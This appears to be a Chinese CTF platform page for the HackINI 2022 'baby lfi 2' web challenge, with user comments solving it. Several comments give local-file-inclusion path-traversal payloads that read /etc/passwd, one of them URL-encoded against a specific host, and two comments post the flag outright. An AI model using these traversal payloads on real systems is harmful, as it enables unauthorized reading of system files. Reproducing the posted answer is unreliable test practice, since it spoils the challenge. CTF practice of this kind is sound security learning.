baby lfi 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2631
提  示:
描  述:
What about making things a bit harder ?
评论
maxiaoyu 1月前

根据上一题也就是baby lfi 1我们依旧使用language来作为参数,根据题目提示,有一个目录是languages的合法目录,因此我们进入这个目录,并使用多个../来退回到根目录,并访问/etc/passwd来拿到flag。

回复 0

000ooo 1年前

?language=./languages/../../../../etc/passwd

回复 1

pandarking 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 0

ljt1016 1年前

为什么不合法就要增加中间的路径(../)?以及,为什么/language前面要加个"."

回复 0

小白帽来挖个漏洞 1年前

https://blog.csdn.net/guanrongl/article/details/142907012

回复 2

MOCHAOLIN 1年前

http://82.157.146.43:15979/?language=./languages/../../../../etc/%70%61%73%73%77%64

回复 0

1005667204 1年前

./language/../../../../../etc/passwd

回复 0

YOLO77w 1年前

和baby lfi 一样的方法

回复 0

15346899030 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

xiaoxiao972521 1年前

/index.php?language=./languages/../../../../etc/passwd

回复 0

WriteUp

image
gushi666

2 金币

评分(6)

解题动态

理塘王丁真 攻破了该题 1小时前
司徒草青 攻破了该题 6小时前
cholmon 攻破了该题 1天前
lqc123456 攻破了该题 3天前
zhouxin1288 攻破了该题 3天前
CTF小白羊 攻破了该题 3天前
zhang 攻破了该题 4天前
evilk 攻破了该题 4天前
dyh1213 攻破了该题 5天前
sky1 攻破了该题 5天前
xlhxl 攻破了该题 5天前
xiaomenghua 攻破了该题 6天前
tiger1cyd 攻破了该题 7天前
xqy520 攻破了该题 7天前
kiritoldws 攻破了该题 8天前
ab1 攻破了该题 9天前
ytdhblk 攻破了该题 9天前
岑女士 攻破了该题 10天前
lynn19920229 攻破了该题 10天前
sss8987yyi 攻破了该题 11天前
问题反馈